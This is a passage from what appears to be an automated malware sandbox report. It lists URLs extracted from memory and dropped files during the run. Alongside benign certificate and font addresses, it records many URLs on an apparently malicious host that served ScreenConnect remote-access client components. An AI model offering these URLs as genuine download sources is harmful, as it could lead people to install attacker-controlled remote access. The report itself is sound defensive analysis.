              Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367404303.00000212BEF2F000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367252644.00000212BEF07000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367830615.00000212BEF7E000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367122651.00000212BEEF5000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
              Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1948935379.000000001B469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micro
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3221000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000013.00000002.2412131785.00000000022AC000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000015.00000002.2005207241.0000000002EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: dfsvc.exe, 0000000E.00000002.2367122651.00000212BEEF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wk3.org/2000/0pldsig#sha1qs
              Source: dfsvc.exe, 0000000E.00000002.2366106744.00000212BEE92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wl3.org/2000/0mldsig#sha1o
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: svchost.exe, 00000007.00000002.1366965576.0000024F94624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/
              Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2361346635.00000212BB9C3000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367252644.00000212BEF07000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BF042000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A38E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3544000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A35EB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A38E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A32B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A32B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
              Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.cheloki
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotl
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Clie
              Source: dfsvc.exe, 0000000E.00000002.2365394785.00000212BD6BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.ap
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1948396561.000000001B42D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000011.00000002.1946552132.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application
              Source: dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A362E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.Wi
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A362E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.Wih
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1946552132.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, C7EOHWRV.log.14.drString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1948935379.000000001B484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application089a7
              Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application1
              Source: dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application2
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1948935379.000000001B484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application8
              Source: C7EOHWRV.log.14.dr, Unconfirmed 974768.crdownload.0.dr, chromecache_128.1.drString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3back
              Source: dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationK
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1946552132.0000000002A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationX
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1948396561.000000001B42D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationZ
              Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationre=msila
              Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applications
              Source: dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationuLXGWokl
              Source: dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationw
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A362E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationx
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.dll
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1946552132.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp, C7EOHWRV.log.14.drString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.manifest
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientSe
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientService.dll
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientService.exe
              Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientService.exe_
              Source: dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Core.dll
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Windows.dll
              Source: dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Windows.dll63:
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstage
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.ex
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2366106744.00000212BEE92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.exe
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367830615.00000212BEF7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config
              Source: dfsvc.exe, 0000000E.00000002.2367830615.00000212BEF7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configt
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A341C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2344956030.00000212A16DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe.config
              Source: dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe.config-U
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exx
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.e
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2359951085.00000212BB8EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe.config
              Source: dfsvc.exe, 0000000E.00000002.2359951085.00000212BB8EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe.configg
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManagp
              Source: svchost.exe, 00000007.00000002.1367091647.0000024F94659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
              Source: svchost.exe, 00000007.00000002.1367177095.0000024F94681000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366547425.0000024F94641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367108889.0000024F94665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366519593.0000024F9465A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000007.00000002.1367177095.0000024F94681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
              Source: svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
              Source: svchost.exe, 00000007.00000002.1367177095.0000024F94681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
              Source: svchost.exe, 00000007.00000002.1367024630.0000024F9463F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367108889.0000024F94665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366519593.0000024F9465A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
              Source: svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1366965576.0000024F94624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
              Source: svchost.exe, 00000007.00000002.1367024630.0000024F9463F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367108889.0000024F94665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
              Source: svchost.exe, 00000007.00000003.1366547425.0000024F94641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367042117.0000024F94644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
              Source: svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
              Source: svchost.exe, 00000007.00000003.1366532997.0000024F94649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000007.00000002.1367042117.0000024F94644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
              Source: svchost.exe, 00000007.00000003.1366547425.0000024F94641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
              Source: svchost.exe, 00000007.00000003.1366457343.0000024F9465D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
